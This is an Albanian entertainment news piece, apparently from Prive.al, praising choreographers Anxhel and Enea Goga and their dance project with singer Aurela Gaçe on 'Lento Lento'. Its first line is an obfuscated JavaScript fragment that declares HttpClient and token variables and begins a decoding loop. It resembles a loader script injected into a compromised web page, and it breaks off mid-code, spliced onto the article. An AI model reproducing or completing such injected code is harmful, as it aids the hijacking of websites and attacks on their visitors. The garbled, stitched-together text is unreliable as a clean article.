;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bashkëpunimi më i ri i suksesshëm i koreografëve Anxhel Goga dhe Enea Goga solli një Aurelë ndryshe nga çfarë e kishim parë më parë!

By

Janë koreografët e njohur të akademisë Dreams House të cilët numërojnë suksese të shumta. Njëra nga sukseset e tyre më të mëdha është mbretëria që zotërojnë në platformën e Youtube, ku renditen në vendin e parë si akademia me numrin më të madh të fansave ndër të gjithë grupet në Shqipëri.

Këtë herë dy koreografët Anxhel dhe Enea Goga kanë ndërmarrë një projekt me këngëtaren e njohur Aurela Gaçe, fituesja e 3 herë rresht e Festivalit të Këngës, 3 herë fituesja e këngës magjike dhe 2 herë fituese e Balkan Music Award, e shumë projekteve të tjera që nuk mund të numërohen.

Aurela këtë herë i surprizoi të gjithë pasi nuk ishte parë kështu asnjëherë më parë . Në këtë projekt Aurela duket shumë komode me trupën e baletit të Dreams House, ku ajo duket se është bërë një me ata .

Profesionalizmi dhe disiplina e tyre ka tërhequr vëmendjen e shumë mediave të tjera. Lento Lento po pëlqehet nga të gjitha grupmoshat për shkak të energjisë pozitive që përcillet nga kjo këngë, shumëllojshmërisë së koreografive dhe pjesëve të TikTok-ut ku po kërcehen nga të gjithë.

Një projekt gjigand ky, me një bashkëpunim të fuqishëm.

Cili do të jetë bashkëpunimi i ardhshëm i dy vëllezërve Anxhel dhe Enea Goga? Ngelet për t’u parë shpërthimi i radhës. /Prive.al

Artikuj të ngjashëm